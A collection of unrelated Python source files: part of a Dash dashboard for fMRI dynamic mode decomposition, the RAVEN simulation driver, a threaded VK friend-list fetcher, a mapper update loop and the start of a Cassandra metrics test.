], [
State('upload-1', 'filename'),
State('upload-2', 'filename'),
State('setting', 'value'),
State('approx-deg', 'value')
])
def upload(contents1, contents2, time, names1, names2, setting, approx_deg):
df1 = None
df2 = None
tab1 = None
tab2 = None
disabled = True
error = False
message = ""
table_config = dict(
fixed_rows=dict(headers=True, data=0),
style_cell=dict(padding="5px"),
style_header=dict(backgroundColor="white",
fontWeight="bold",
fontFamily="Helvetica",
padding="0px 5px"),
style_data=dict(fontFamily="Helvetica"),
style_data_conditional=[{'if': dict(row_index="odd"), # if is a keyword
**dict(backgroundColor="rgb(248, 248, 248)")}],
style_as_list_view=True,
style_table={'height': '90%', 'overflowY': 'auto'},
export_format="csv"
)
columns = [dict(name='#', id='mode'), dict(name='Value', id='value'),
dict(name='Damping Time', id='damping_time'), dict(name='Period', id='period')]
if [contents1, contents2, names1, names2].count(None) == 4:
raise PreventUpdate
else:
try:
if contents1 is not None:
logging.info("Adding contents to {}.".format("Group 1" if setting == 2 else "Reference Group"))
self.dcp1 = _parse_files(contents1, names1, float(time))
self.dcp1.run()
df1 = self.dcp1.df[['mode', 'value', 'damping_time', 'period']]
logging.info(
"Creating Data Table for {}.".format("Group 1" if setting == 2 else "Reference Group"))
tab1 = _create_table(df1, id="table-1", columns=columns, config=table_config)
if setting != 1:
if contents2 is not None and (self.dcp2 is None or self.match_group is None):
if setting == 2: # Comparison
logging.info("Adding contents to Group 2.")
self.dcp2 = _parse_files(contents2, names2, float(time))
self.dcp2.run()
df2 = self.dcp2.df[['mode', 'value', 'damping_time', 'period']]
tab2 = _create_table(df2, id="table-2", columns=columns, config=table_config)
disabled = False
if setting == 3: # Mode Matching
logging.info("Adding contents to Match Group.")
self.match_group = _parse_files(contents2, names2, float(time))
self.match_group.run()
if self.dcp1 is None:
raise ImportError("Please upload Reference group before Match group.")
else:
no_modes = int(approx_deg / 100.0 * self.match_group.atlas.size)
self.match_df, self.match_x, self.match_y = self.dcp1.compute_match(
self.match_group,
no_modes)
match_df = self.match_df.copy()
tab2 = _create_table(match_df, id="table-2", columns=columns, config=table_config)
disabled = False
except Exception as e:
logging.error(traceback.format_exc())
message = str(e)
error = True
deb = "Types = Group 1: {0}, Group 2: {1}, Match: {2}".format(type(self.dcp1), type(self.dcp2),
type(self.match_group))
logging.debug(deb)
hide = {'display': 'none'}
show = {}
def indent(lines):
if isinstance(lines, list):
return html.P(', \n'.join(lines))
else:
return html.P(lines)
return indent(names1), indent(names2), tab1, tab2, disabled, hide if contents1 is not None else show, \
hide if contents2 is not None else show, message, show if error else hide
@self.app.callback(
Output('imag-setting', 'options')
, [
Input('imag-setting', 'value')
])
def imag_switch(switch):
""" Switch between displaying and not displaying imaginary values. """
self.imag = switch == [1]
message = "Plotting imaginary values" if self.imag else "Not plotting imaginary values"
logging.info(message)
options = [{"label": message, "value": 1}]
return options
@self.app.callback([
Output('message-alert', 'children'),
Output('message-alert', 'style'),
Output('upload-row', 'style')
], [
Input('run', 'n_clicks')
], [
State('setting', 'value')
])
def validate(n, setting):
"""
Validate input
:param n: [int] onClick() "Run Decomposition" button
:param setting: [int] value of setting radio
:return message: [str] error message
:return style: [dict] show or hide error message
:return style: [dict] show or hide upload row
"""
message = ""
error = False
if n is None:
raise PreventUpdate
if setting is not None:
if setting == 1:
if self.dcp1 is None:
message += "No file(s) chosen. "
error = True
elif setting == 2:
if self.dcp1 is None or self.dcp2 is None:
message += "Group {} missing. ".format(2 if self.dcp2 is None else 1)
error = True
elif setting == 3:
if self.dcp1 is None:
message += "Reference group missing. "
error = True
if self.match_df is None:
message += "Match group is loading. Please wait. "
error = True
elif self.atlas is None:
message += "Parsing unsuccessful, no atlas found. "
error = True
else:
message += "No setting chosen. "
error = True
if error:
message += "Check log for more info."
else:
self.valid = True
hide = dict(display="none")
return message, {} if error else hide, {} if error else hide
@self.app.callback([
Output('app-layout', 'children')
], [
Input('reset', 'n_clicks')
])
def rst(n):
""" Reset Application. """
if n is None:
raise PreventUpdate
else:
self.dcp1 = None
self.dcp2 = None
self.match_group = None
self.match_df = None
self.match_x = None
self.match_y = None
self.atlas = None
self.progress = 0
self.valid = False
self.imag = False
return [self._get_app_layout()]
@self.app.callback(
Output('spectre', 'figure')
, [
Input('run', 'n_clicks')
]
)
def compute_spectre(n):
"""
Compute Spectre figure
:param n: [int] onClick() "Run Decomposition" button
:return: [go.Figure] figure
"""
if n is None or not self.valid:
raise PreventUpdate
else:
if self.match_group is None:
logging.info("Computing spectre of dynamical modes")
s = Spectre(*_filter_spectre())
return s.figure()
else:
assert self.match_x is not None
assert self.match_y is not None
logging.info("Computing spectre of dynamical modes")
return Spectre.correlation(pd.DataFrame({'Approximated': self.match_x, 'Real': self.match_y}))
@self.app.callback(
Output('timeplot', 'figure')
, [
Input('run', 'n_clicks')
], [
State('number-of-modes', 'value')
])
def compute_timeplot(n, nom):
"""
Compute Timeplot figure
:param n: [int] onClick() "Run Decomposition" button
:param nom: [int] number of modes
:return: [go.Figure] figure
"""
if n is None or not self.valid:
raise PreventUpdate
else:
logging.info("Computing time series activation of dominant modes")
t = TimePlot(*_filter_time())
return t.figure(nom + 1)
@self.app.callback(
Output('radar', 'figure')
, [
Input('run', 'n_clicks')
], [
State('number-of-modes', 'value')
])
def compute_radar(n, nom):
"""
Compute Radar figure
:param n: [int] onClick() "Run Decomposition" button
:param nom: [int] number of modes
:return: [go.Figure] figure
"""
if n is None or not self.valid:
raise PreventUpdate
else:
logging.info("Computing cortical network activation")
r = Radar(*_filter_radar())
return r.figure(self.imag, nom + 1)
@self.app.callback([
Output('brains', 'children'),
Output('progress-div', 'style')
], [
Input('run', 'n_clicks')
], [
State('number-of-modes', 'value')
])
def compute_brain(n, nom):
"""
Compute brain figures
:param n: [int] onClick() "Run Decomposition" button
:param nom: [int] number of modes
:return brains: [list of html.Div] figures
:return style: [dict] hide progress Div
"""
if n is None or not self.valid:
raise PreventUpdate
else:
logging.info("Computing cortical surface representations")
brains = []
self.progress += 10.0
for mode in range(1, nom + 1):
b = Brain(*_filter_brain(mode))
brains.append(html.Div(children=[
dcc.Graph(figure=b.figure(self.imag), config=dict(displaylogo=False,
toImageButtonOptions=dict(
width=None, height=None,
format="svg",
filename="mode {}".format(mode))))
]))
self.progress += 90.0 / nom
return brains, dict(display="none")
@self.app.callback([
Output("progress", "value"),
Output("progress", "children")
], [
Input("progress-interval", "n_intervals")
])
def progress(n):
"""
            Update the cortical-surface rendering progress bar.
            Inspired by https://stackoverflow.com/questions/59241705/dash-progress-bar-for-reading-files
            """
            # report self.progress (incremented by compute_brain above), capped
            # at 100 so the bar never overflows
prog = min(self.progress % 110, 100)
# only add text after 5% progress to ensure text isn't squashed too much
return prog, "{} %".format(prog if prog >= 5 else "")
# UTILITY FUNCTIONS
# placed in run_dash because of daemon=True
def _parse_files(contents, files, sampling_time):
"""
Parse incoming .mat files.
:param contents: list of Base64 encoded contents
:param files: list of names
:param sampling_time: sampling time of data
:return decomposition: Decomposition instance
"""
logging.info("Parsing {0} file{1} with sampling time {2}".format(len(files),
's' if len(files) > 1 else '',
sampling_time))
data = []
for content, name in zip(contents, files):
d = None
if Path(name).suffix == '.mat':
_, string = content.split(',')
mat = io.BytesIO(base64.b64decode(string))
matfile = sio.loadmat(mat)
for key in matfile.keys():
if key[:2] != '__':
d = matfile[key]
logging.info("Extracted matrix from file {} from key {}".format(name, key))
continue
if d is None:
logging.error("Invalid .mat file, no matrices inside.")
raise ImportError("Invalid .mat file, no matrices inside.")
elif Path(name).suffix == '.csv':
_, content_string = content.split(',')
decoded = base64.b64decode(content_string)
d = np.genfromtxt(
io.StringIO(decoded.decode('utf-8')),
delimiter=","
)
if d is None:
logging.error("Problem reading the csv file.")
raise ImportError("Problem reading the csv file.")
data.append(d)
logging.info("Extracting information from file...")
dcp = Decomposition(data=data, sampling_time=sampling_time)
self.atlas = dcp.atlas
return dcp
def _filter_spectre():
""" Filter df for Spectre Figure. """
logging.info("Filtering Spectre data")
if self.dcp2 is not None:
return self.dcp1.df, ['Group 1', 'Group 2'], self.dcp2.df
elif self.match_group is not None:
return self.dcp1.df, ['Reference', 'Match'], self.match_group.df
else:
return self.dcp1.df, [''], None
def _filter_time():
""" Filter df for Timeplot Figure. """
logging.info("Filtering TimePlot data")
return self.dcp1.df, self.dcp2.df if self.dcp2 is not None else None
def _filter_radar():
""" Filter df for Radar Figure. """
logging.info("Filtering Radar data")
if self.dcp2 is not None:
assert self.dcp1.atlas == self.dcp2.atlas
return self.dcp1.df, self.dcp1.atlas, self.dcp2.df if self.dcp2 is not None else None
def _filter_brain(order):
"""
Filter brain information.
:param order: [int] mode order
:return atlas: [str] cortical atlas
:return mode1: [pd.DataFrame] for mode 1
:return mode2: [pd.DataFrame] for mode 2
:return order: [int] mode order
"""
logging.info("Filtering Brain data for Mode {}".format(order))
return self.dcp1.df, order, self.dcp1.atlas.coords_2d, self.dcp2.df if self.dcp2 is not None else None
def _format_table(df):
"""
Format table
:param df: [pd.DataFrame] data
:return: [pd.DataFrame]
"""
def _set_precision(number):
if number == np.inf:
return 'inf'
if type(number) != str:
number = str(number)
splat = number.split('.')
splat[1] = splat[1][:5] if len(splat[1]) > 5 else splat[1]
return ".".join([splat[0], splat[1]])
def _handle_complex(number):
splat = [str(number.real), str(np.abs(number.imag))]
sett = [_set_precision(splat[0]), _set_precision(splat[1])]
return "{0} +/- {1} j".format(sett[0], sett[1])
def _format_list(p):
f = _handle_complex if type(p[0]) == np.complex128 else _set_precision
return [f(e) for e in p]
df['value'] = _format_list(df['value'])
df['damping_time'] = _format_list(df['damping_time'])
df['period'] = _format_list(df['period'])
return df
def _create_table(df, id=None, columns=None, config=None):
"""
Create table.
:param df: [pd.DataFrame] data
:param id: [str] id in app.layout
:param columns: [list] following Dash rules
:param config: [dict] of config elements for table
:return: [html.Div] containing DataTable
"""
if df is None:
return None
else:
data = _format_table(df).to_dict('records')
return html.Div(className="container mt-4", children=[DataTable(id=id, data=data,
columns=columns, **config)])
self.app.run_server(debug=False, port=port, host=address)
@staticmethod
def _get_app_layout():
logging.info("Setting Application Layout")
return html.Div(id="app-layout", style=dict(maxWidth='95vw'), children=[
dbc.Modal(id="help-modal", is_open=True, children=[
dbc.ModalHeader("Welcome to the Dynamic Mode Decomposition Dashboard!"),
dbc.ModalBody(children=[
html.P("Based on 'Dynamic mode decomposition of resting-state and task fMRI' by Casorso et al, \
the dmd dashboard allows you to analyse, compare, and display the dynamic decomposition of \
fMRI time-series data."),
html.H5("Analysis"),
html.P("Analyse the decomposition of one or multiple time-series files. Simply input the sampling \
time, select the wanted file(s) and the amount of modes you want to have visualisations \
for."),
html.H5("Comparison"),
html.P("The comparison setting allows you to analyse two different groups of file(s) and visualize \
the similarities and/or differences in their decompositions."),
html.H5("Match Modes"),
html.P("The Match Modes setting allows you to match a group's decomposition to a reference group. \
For this setting, it is important to select the Reference group before the Match group. "
"As the mode matching is a heavy computational task, we allow you to approximate the top "
"10 modes using an approximation degree that should be between 0 and 100. Please note that "
"the higher the approximation degree, the longer the program will run. \
Furthermore, please identify the approximation degree before uploading the Match data."),
html.P("This pop-up remains accessible by clicking on the Help button.", className="mt-3"),
html.P("If you have any questions, do not hesitate to open an issue on the Github repository or contact \
me directly by email: arnaud.dhaene@epfl.ch", className="mt-5")
]),
]),
dbc.Modal(id="help-modal-selection", is_open=False, children=[
dbc.ModalHeader("Welcome to the Selection toolbar!"),
dbc.ModalBody(children=[
html.P("This is where you can input all the parameters for the decomposition visualization."),
html.H5("File Selection"),
html.P("The dashboard accepts either MATLAB or csv files. For MATLAB files, the object "
"corresponding to the last key in the file structure dictionary will be chosen. "
"If everything goes according to plan, the name(s) of your file(s) are displayed just above "
"the selection buttons. "
"Error messages will be displayed under the selection buttons. If anything goes wrong, "
"make sure to also check the log, where a Traceback is always displayed."),
html.H5("Sampling Time (seconds)"),
html.P("Here, you can input the sampling time of your recording. This is used for the visualization"
" that shows the activity of each mode versus time."),
html.H5("Number of modes"),
html.P("A straightforward parameter. As computation can be heavy for the cortical surface plots, "
"you can decide the first n modes to be visualized. If you want to plot a specific mode, "
"please refer to the `nidmd` Python module documentation examples."),
html.H5("[Mode Matching] Approximation degree"),
html.P("As the top 10 match group modes are approximated using a specific number of modes, "
"an approximation degree is introduced that ranges between 0 and 100. This is relative "
"to the percentage of the total modes used for the approximation. For instance, if you want "
"to use the first 50 modes of Schaefer data, 50 / 400 --> approximation degree: 25"),
html.H5("Plot imaginary values"),
html.P("It is completely up to you to decide whether or not you wish to plot the imaginary values "
"of the decomposition."),
html.P("If you have any questions, do not hesitate to open an issue on the Github repository or "
"contact me directly by email: arnaud.dhaene@epfl.ch", className="mt-5")
]),
]),
html.Div(className="row", children=[
                # ########## #
                # LEFT PANEL #
                # ########## #
html.Div(className="col-4", children=[
# ####################### #
# HEADER + FILE SELECTION
# ####################### #
# HEADER = TITLE + DESCRIPTION + SETTING
html.Div(style={'margin-top': '25px'}, children=[
dbc.FormGroup(row=True, children=[
html.Div(className="ml-5 mt-2", children=[
# TITLE
html.H5("Dynamic Mode Decomposition Dashboard"),
html.P("Access a short description of the dashboard by clicking on 'Help'. \
A more detailed description can be found in the repository's README."),
# DESCRIPTION
dbc.Button("Help", id="help-general", className="mr-2"),
dbc.Button("Reset", color="primary", id="reset"),
]),
dbc.Col(className="ml-5 mt-4", children=[
# SETTING
dbc.Label("Setting", className="mt-2"),
dbc.RadioItems(id="setting", options=[
{"label": "Analysis", "value": 1},
{"label": "Comparison", "value": 2},
{"label": "Mode Matching", "value": 3}
])
])
])
]),
# FILE SELECTION
html.Div(className="col-12", children=[
html.Div(className="mt-2 mb-2 mr-2 ml-2", id="file-selection-card", children=[
dbc.Card(dbc.CardBody(children=[
# TITLE
html.H5("Selection", className="card-title"),
html.Div(children=[
# SELECTION INPUT
html.Div(children=[
dbc.FormGroup(children=[
dbc.Label("Sampling Time (seconds)", className="mt-2"),
dbc.Input(id="sampling-time", type="number", placeholder="0.72",
value=0.72),
dbc.Label("Number of modes to plot", className="mt-2"),
dbc.Input(id="number-of-modes", type="number", placeholder="5",
value=5),
html.Div(id="approx-deg-div", children=[
dbc.Label("Approximation degree", className="mt-2"),
dbc.Input(id="approx-deg", type="number", placeholder="5",
value=5)
]),
dbc.Checklist(className="mt-2", id="imag-setting", value=[], switch=True,
options=[dict(label="Plot Imaginary Values", value=1)]),
]),
]),
# SELECTED FILES
html.Div(children=[
dbc.Label(id="selected-files-group-1-t"),
html.P(id="selected-files-group-1-p"),
html.Div(className="mb-2", id="animated-progress-1-div", children=[
dbc.Progress(value=80, id="animated-progress-1", striped=True,
animated="animated", style={'display': 'none'})
]),
dbc.Label(id="selected-files-group-2-t"),
html.P(id="selected-files-group-2-p"),
html.Div(id="animated-progress-2-div", className="mb-2", children=[
dbc.Progress(value=80, id="animated-progress-2", striped=True,
animated="animated", style={"display": "none"})
]),
html.Div(id="import-alert", className="text-danger mt-2")
]),
]),
# BUTTONS + ALERT MESSAGE
html.Div(children=[
dbc.Button("Help", id="help-selection", className="mr-2"),
dbc.Button("Run", color="primary", id="run", className="mr-2"),
html.Div(id="message-alert", className="text-danger mt-2")
]),
]))
]),
]),
]),
# ########### #
# RIGHT PANEL #
# ########### #
html.Div(className="col-8", children=[
# ########## #
# UPLOAD ROW
# ########## #
html.Div(className="row", id="upload-row", children=[
# UPLOAD 1
html.Div(id="upload-1-div", children=[
dcc.Upload(id="upload-1", multiple=True)
]),
# UPLOAD 2
html.Div(id="upload-2-div", children=[
dcc.Upload(id="upload-2", multiple=True)
])
]),
# ####### #
# CONTENT #
# ####### #
# TABS = GRAPHS + TABLE 1 + TABLE 2 + LOG
dbc.Tabs(className="mt-3", children=[
# GRAPHS
dbc.Tab(label="Graphs", children=[
# RADAR + SPECTRE + TIMEPLOT
html.Div(className="row", children=[
# RADAR
html.Div(className="col-6", children=[
html.Div(children=[
dcc.Graph(id="radar",
config=dict(displaylogo=False,
toImageButtonOptions=dict(
width=None, height=None,
format="svg", filename="radar")))
]),
]),
# SPECTRE
html.Div(className="col-6", children=[
html.Div(children=[
dcc.Graph(id="spectre",
config=dict(displaylogo=False,
toImageButtonOptions=dict(
width=None, height=None,
format="svg", filename="spectre")))
]),
]),
]),
# TIMEPLOT
html.Div(children=[
html.Div(children=[
dcc.Graph(id="timeplot",
config=dict(displaylogo=False,
toImageButtonOptions=dict(
width=None, height=None,
format="svg", filename="timeplot")))
]),
]),
]),
# BRAINS
dbc.Tab(label="Cortical Plots", id="brains-tab", children=[
# BRAINS
html.Div(className="col-12", id="brains"),
# PROGRESS
html.Div(className="col-12 my-4 mx-4", id="progress-div", children=[
html.P('Loading cortical surface graphs...', className="mt-4"),
dcc.Interval(id="progress-interval", n_intervals=0, interval=500),
dbc.Progress(id="progress", style=dict(width='70%', align='center')),
]),
]),
# TABLE 1
dbc.Tab(label="Group A", id="table-1-tab"),
# TABLE 2
dbc.Tab(label="Group B", disabled=True, id="table-2-tab"),
# LOG
dbc.Tab(label="Log", id='log-tab', children=[
html.Div(className="col-12", id="log-div", style=dict(overflow='scroll',
height='90vh'),
children=[
dcc.Interval(id='log-update', interval=3000), # interval in milliseconds
html.Div(id='log', children=[
html.P("———— APP START ————"),
]),
]),
]),
]),
]),
]),
])
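# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the original module): one way to embed the
# Dashboard in a standalone Qt application. The QApplication wiring below is
# an assumption; the project's real entry point may differ.
if __name__ == '__main__':
    import sys
    qt_app = QtWidgets.QApplication(sys.argv)
    window = Dashboard()        # starts the Dash server in a daemon thread
    window.show()               # __init__ already calls showMaximized()
    sys.exit(qt_app.exec_())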
|
Driver.py
|
#!/usr/bin/env python
# Copyright 2017 Battelle Energy Alliance, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Created on Feb 20, 2013
@author: crisr
This is the Driver of RAVEN
"""
#For future compatibility with Python 3
from __future__ import division, print_function, absolute_import
import warnings
warnings.simplefilter('default',DeprecationWarning)
#End compatibility block for Python 3
#External Modules--------------------begin
import xml.etree.ElementTree as ET
import os
import sys
import threading
import time
import traceback
#External Modules--------------------end
#warning: this needs to be before importing h5py
os.environ["MV2_ENABLE_AFFINITY"]="0"
frameworkDir = os.path.dirname(os.path.abspath(__file__))
from utils import utils
import utils.TreeStructure as TS
utils.find_crow(frameworkDir)
if sys.version_info.major == 2:
utils.add_path_recursively(os.path.join(frameworkDir,'contrib','pp'))
else:
utils.add_path_recursively(os.path.join(frameworkDir,'contrib','pp3'))
utils.add_path(os.path.join(frameworkDir,'contrib','AMSC'))
utils.add_path(os.path.join(frameworkDir,'contrib'))
#Internal Modules
from Simulation import Simulation
from Application import __QtAvailable
from Interaction import Interaction
#Internal Modules
#------------------------------------------------------------- Driver
def printStatement():
"""
Method to print the BEA header
@ In, None
@ Out, None
"""
print("""
Copyright 2017 Battelle Energy Alliance, LLC
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
""")
def printLogo():
"""
Method to print a RAVEN logo
@ In, None
@ Out, None
"""
print("""
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.---. .------###### ##### ### ### ######## ### ###
/ \ __ / --### ### ### ### ### ### ### ##### ###
/ / \( )/ --### ### ### ### ### ### ###### ### ######
////// ' \/ ` --####### ######### ### ### ### ### #####
//// / // : : -### ### ### ### ###### #### ### ####
// / / /` '---### ### ### ### ### ######## ### ###
// //..\\
===========UU====UU=============================================================
'//||\\`
''``
""")
def checkVersions():
"""
Method to check if versions of modules are new enough. Will call sys.exit
if they are not in the range specified.
@ In, None
@ Out, None
"""
sys.path.append(os.path.join(os.path.dirname(frameworkDir),"scripts","TestHarness","testers"))
import RavenUtils
sys.path.pop() #remove testers path
missing,outOfRange,notQA = RavenUtils.check_for_missing_modules(False)
if len(missing) + len(outOfRange) > 0 and RavenUtils.check_versions():
print("ERROR: too old, too new, or missing raven libraries, not running:")
for error in missing + outOfRange + notQA:
print(error)
sys.exit(-4)
else:
if len(missing) + len(outOfRange) > 0:
print("WARNING: not using tested versions of the libraries:")
for warning in notQA + missing + outOfRange:
print(warning)
if __name__ == '__main__':
"""This is the main driver for the RAVEN framework"""
# Retrieve the framework directory path and working dir
printLogo()
printStatement()
checkVersions()
verbosity = 'all'
interfaceCheck = False
interactive = Interaction.No
workingDir = os.getcwd()
## Remove duplicate command line options and preserve order so if they try
## conflicting options, the last one will take precedence.
sys.argv = utils.removeDuplicates(sys.argv)
itemsToRemove = []
for item in sys.argv:
# I don't think these do anything. - talbpaul, 2017-10
if item.lower() in ['silent','quiet','all']:
verbosity = item.lower()
itemsToRemove.append(item)
elif item.lower() == 'interfacecheck':
interfaceCheck = True
itemsToRemove.append(item)
elif item.lower() == 'interactive':
if __QtAvailable:
interactive = Interaction.Yes
else:
print('Qt is not available, disabling interactive mode.\n')
itemsToRemove.append(item)
elif item.lower() == 'interactivecheck':
if __QtAvailable:
interactive = Interaction.Test
else:
print('Qt is not available, disabling interactive check.\n')
itemsToRemove.append(item)
## Now outside of the loop iterating on the object we want to modify, we are
## safe to remove each of the items
for item in itemsToRemove:
sys.argv.remove(item)
if interfaceCheck:
os.environ['RAVENinterfaceCheck'] = 'True'
print('Interface CHECK activated!\n')
else:
os.environ['RAVENinterfaceCheck'] = 'False'
simulation = Simulation(frameworkDir, verbosity=verbosity, interactive=interactive)
#If a configuration file exists, read it in
configFile = os.path.join(os.path.expanduser("~"),".raven","default_runinfo.xml")
if os.path.exists(configFile):
tree = ET.parse(configFile)
root = tree.getroot()
if root.tag == 'Simulation' and [x.tag for x in root] == ["RunInfo"]:
simulation.XMLread(root,runInfoSkip=set(["totNumCoresUsed"]),xmlFilename=configFile)
else:
      e = IOError('DRIVER', str(configFile)+' should contain only a Simulation root node with a single RunInfo block inside it')
print('\nERROR! In Driver,',e,'\n')
sys.exit(1)
# Find the XML input file
if len(sys.argv) == 1:
#NOTE: This can be overriden at the command line:
# python Driver.py anotherFile.xml
# or in the configuration file by DefaultInputFile
inputFiles = [simulation.getDefaultInputFile()]
else:
inputFiles = sys.argv[1:]
for i in range(len(inputFiles)):
if not os.path.isabs(inputFiles[i]):
inputFiles[i] = os.path.join(workingDir,inputFiles[i])
simulation.setInputFiles(inputFiles)
#Parse the input
#For future developers of this block, assure that useful, informative exceptions
# are still thrown while parsing the XML tree. Otherwise any error made by
# the developer or user might be obfuscated.
for inputFile in inputFiles:
try:
tree = TS.parse(open(inputFile,'r'))
except TS.InputParsingError as e:
print('\nInput Parsing error!',e,'\n')
sys.exit(1)
#except? riseanIOError('not possible to parse (xml based) the input file '+inputFile)
if verbosity=='debug':
print('DRIVER','opened file '+inputFile)
root = tree.getroot()
if root.tag != 'Simulation':
      e = IOError('The outermost block of the input file '+inputFile+' is not Simulation')
print('\nInput XML Error!',e,'\n')
sys.exit(1)
# call the function to load the external xml files into the input tree
cwd = os.path.dirname(os.path.abspath(inputFile))
simulation.XMLpreprocess(root,cwd)
#generate all the components of the simulation
#Call the function to read and construct each single module of the simulation
simulation.XMLread(root,runInfoSkip=set(["DefaultInputFile"]),xmlFilename=inputFile)
def raven():
"""
A worker function that allows the computation of the main RAVEN execution
to be offloaded to another thread, freeing the main thread for UI
interaction (Qt requires UI to be handled on the main thread of execution)
"""
simulation.initialize()
simulation.run()
## If there is an associated UI application, then we can quit it now that
## we are done, the main thread does not know when this done presumably
## because this thread still is technically running as long as the app,
## which both threads can see, has not called quit. Otherwise, we could do
## this after the while loop below.
if simulation.app is not None:
simulation.app.quit()
if simulation.app is not None:
try:
## Create the thread that will run RAVEN, and make sure that it will die if
## the main thread dies by making it a daemon, then start it up
ravenThread = threading.Thread(target=raven)
ravenThread.daemon = True
ravenThread.start()
## If there is an associated application, then we can start it up now as
## well. It will listen for UI update requests from the ravenThread.
if simulation.app is not None:
simulation.app.exec_()
## This makes sure that the main thread waits for RAVEN to complete before
## exiting, however join will block the main thread until ravenThread is
## complete, thus ignoring any kill signals until after it has completed
# ravenThread.join()
waitTime = 0.1 ## in seconds
## So, in order to live wait for ravenThread, we need a spinlock that will
## allow us to accept keyboard input.
      while ravenThread.is_alive():
## Use one of these two alternatives, effectively they should be the same
## not sure if there is any advantage to one over the other
time.sleep(waitTime)
# ravenThread.join(waitTime)
except KeyboardInterrupt:
      if ravenThread.is_alive():
traceback.print_stack(sys._current_frames()[ravenThread.ident])
print ('\n\n! Received keyboard interrupt, exiting RAVEN.\n\n')
except SystemExit:
      if ravenThread.is_alive():
traceback.print_stack(sys._current_frames()[ravenThread.ident])
print ('\n\n! Exit called, exiting RAVEN.\n\n')
else:
raven()
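# ---------------------------------------------------------------------------
# Hedged usage note (not part of the original script). Based on the argument
# handling above, typical invocations look like the following; flag names are
# matched case-insensitively, and when no file is given the input comes from
# DefaultInputFile in ~/.raven/default_runinfo.xml:
#
#   python Driver.py my_simulation.xml
#   python Driver.py my_simulation.xml interfaceCheck
#   python Driver.py my_simulation.xml interactive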
|
SecondLevel.py
|
import threading
from vkconnections import VkAPI as API
class SecondDivision:
def __init__(self, list_of_vk_script, token):
self.listOfVkScript = list_of_vk_script
self.token = token
self.data = []
def execute(self):
listOutput = []
for item in self.listOfVkScript:
temp = API.get_execute(item, self.token)
listOutput.append(temp)
self.data = listOutput
def get_data(self):
return self.data
# input: list of users' ids
# output: list of lists of friends
def get_list_of_friends(all_the_users, two_tokens, thread_name):
firstList, secondList = get_half_of_vk_script(all_the_users)
firstList, secondList = make_second_division(firstList, secondList, two_tokens, thread_name)
return get_full_list(firstList, secondList)
def get_half_of_vk_script(all_the_users):
list_of_vk_script = API.get_vk_script_for_execute(all_the_users)
middle = len(list_of_vk_script) // 2
first_list = list_of_vk_script[:middle]
second_list = list_of_vk_script[middle:]
return first_list, second_list
def make_second_division(first_list, second_list, two_tokens, thread_name):
first_half_second_division = SecondDivision(first_list, two_tokens[1])
second_half_second_division = SecondDivision(second_list, two_tokens[2])
first_list = threading.Thread(target=first_half_second_division.execute, name=thread_name + 'Second Division - 1')
second_list = threading.Thread(target=second_half_second_division.execute, name=thread_name + 'Second Division - 2')
first_list.start()
second_list.start()
first_list.join()
second_list.join()
first_list = first_half_second_division.get_data()
second_list = second_half_second_division.get_data()
return first_list, second_list
def get_full_list(first_list, second_list):
list_output = first_list + second_list
return_list = []
for item in list_output:
for iterator in item:
return_list.append(iterator)
return return_list
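# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the original module). Note that
# make_second_division() reads two_tokens[1] and two_tokens[2], so the token
# sequence passed in needs valid entries at those indices; the ids and tokens
# below are placeholders.
if __name__ == '__main__':
    user_ids = [1, 2, 3]                                   # placeholder VK ids
    tokens = [None, 'token-for-first-half', 'token-for-second-half']
    friends = get_list_of_friends(user_ids, tokens, thread_name='demo ')
    print('collected {} friend lists'.format(len(friends)))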
|
MapperController.py
|
'''
Created on Nov 22, 2021
@author: Japi42
'''
import threading
import time
from ECL_config import main_config
condition = threading.Condition()
def startup():
ut = threading.Thread(name='UpdateMappersThread', target=updateMappersThread, daemon=True)
ut.start()
def updateMappersThread():
print("Start Mapper Thread")
while True:
with condition:
for mapper_id in main_config.mappers:
mapper = main_config.mappers[mapper_id]
mapper.update()
time.sleep(0.01)
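# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the original module): startup() only spawns
# the daemon update loop, so callers that mutate main_config.mappers can take
# the same condition to avoid racing a mapper.update() in flight. SomeMapper
# is a hypothetical mapper object with an update() method.
#
#   startup()
#   with condition:
#       main_config.mappers['m1'] = SomeMapper()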
|
test_cassandra.py
|
# (C) Datadog, Inc. 2010-2017
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
# stdlib
import threading
import time
from types import ListType
import unittest
import os
import mock
# 3p
from nose.plugins.attrib import attr
# project
from aggregator import MetricsAggregator
import logging
LOG_INFO = {
'log_to_event_viewer': False,
'log_to_syslog': False,
'syslog_host': None,
'syslog_port': None,
'log_level': logging.INFO,
'disable_file_logging': True,
'collector_log_file': '/var/log/sd-agent/collector.log',
'forwarder_log_file': '/var/log/sd-agent/forwarder.log',
'sdstatsd_log_file': '/var/log/sd-agent/sdstatsd.log',
'jmxfetch_log_file': '/var/log/sd-agent/jmxfetch.log',
'go-metro_log_file': '/var/log/sd-agent/go-metro.log',
}
with mock.patch('config.get_logging_config', return_value=LOG_INFO):
from sdstatsd import Server
from jmxfetch import JMXFetch
log = logging.getLogger('cassandra_test')
STATSD_PORT = 8121
class DummyReporter(threading.Thread):
def __init__(self, metrics_aggregator):
threading.Thread.__init__(self)
self.metrics_aggregator = metrics_aggregator
self.interval = 10
self.metrics = None
self.finished = False
self.start()
def run(self):
while not self.finished:
time.sleep(self.interval)
self.flush()
def flush(self):
metrics = self.metrics_aggregator.flush()
if metrics:
self.metrics = metrics
@attr(requires='cassandra')
class JMXTestCase(unittest.TestCase):
def setUp(self):
aggregator = MetricsAggregator("test_host")
self.server = Server(aggregator, "localhost", STATSD_PORT)
self.reporter = DummyReporter(aggregator)
